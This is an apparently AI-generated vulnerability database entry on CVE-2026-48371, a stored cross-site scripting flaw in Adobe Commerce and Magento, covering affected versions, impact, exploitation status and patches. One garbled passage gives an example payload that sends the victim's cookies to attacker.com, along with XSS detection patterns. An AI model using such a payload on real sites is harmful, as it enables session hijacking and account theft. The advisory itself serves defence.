
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-48371 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce, Adobe Commerce B2B, and Magento Open Source that allows a low-privileged authenticated attacker to inject malicious scripts into vulnerable form fields. When a victim browses to the page containing the compromised field, the malicious JavaScript executes in their browser. Affected versions include Adobe Commerce up to 2.4.9/2.4.8-p5/2.4.7-p10/2.4.6-p15/2.4.5-p17/2.4.4-p18, Adobe Commerce B2B up to 1.5.3/1.5.2-p5/1.4.2-p10/1.3.4-p17/1.3.3-p18, Magento Open Source up to 2.4.9/2.4.8-p5/2.4.7-p10/2.4.6-p15, and the Adobe Commerce Webhooks Plugin up to version 1.20.0. The vulnerability was published on July 14, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Adobe Advisory).
The root cause is improper neutralization of user-controllable input before it is placed in output rendered as a web page, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An attacker with low-level authenticated access can submit malicious JavaScript payloads into vulnerable form fields within the Adobe Commerce or Magento admin/storefront interface; the application fails to sanitize or encode this input before storing and subsequently rendering it to other users. Exploitation requires user interaction — a victim must navigate to the page containing the injected field — and the scope is marked as changed, meaning the injected script can affect resources beyond the vulnerable component's security boundary (GitHub Advisory, Adobe Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the page containing the injected field, including administrators. This can lead to session cookie theft, credential harvesting, forged requests on behalf of the victim (CSRF-like actions), and defacement of the application interface. While availability is not directly impacted, the confidentiality and integrity risks are meaningful — particularly if an administrator account is targeted, potentially enabling privilege escalation or further compromise of the Commerce platform (GitHub Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (GitHub Advisory). The EPSS score is approximately 0.18–0.29%, indicating a low near-term probability of exploitation. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privileged authenticated account and victim interaction, which somewhat limits the attack surface compared to unauthenticated vulnerabilities.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent obfuscated variant.<script>, onerror=, javascript:) submitted to form endpoints; repeated access to pages containing stored user input by different user accounts in short succession.Adobe has released patched versions addressing this vulnerability. Users should upgrade to the July 2026 security releases: Adobe Commerce 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, 2.4.6-2026-jul, 2.4.5-2026-jul, or 2.4.4-2026-jul; Adobe Commerce B2B 1.5.3-2026-jul, 1.5.2-2026-jul, 1.4.2-2026-jul, 1.3.4-2026-jul, or 1.3.3-2026-jul; Magento Open Source 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, or 2.4.6-2026-jul; and Adobe Commerce Webhooks Plugin 1.21.0. As interim mitigations, organizations should implement a Web Application Firewall (WAF) with XSS detection rules, enforce strict input validation and output encoding on all form fields, and restrict low-privileged user access to sensitive input areas where possible (Adobe Advisory, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."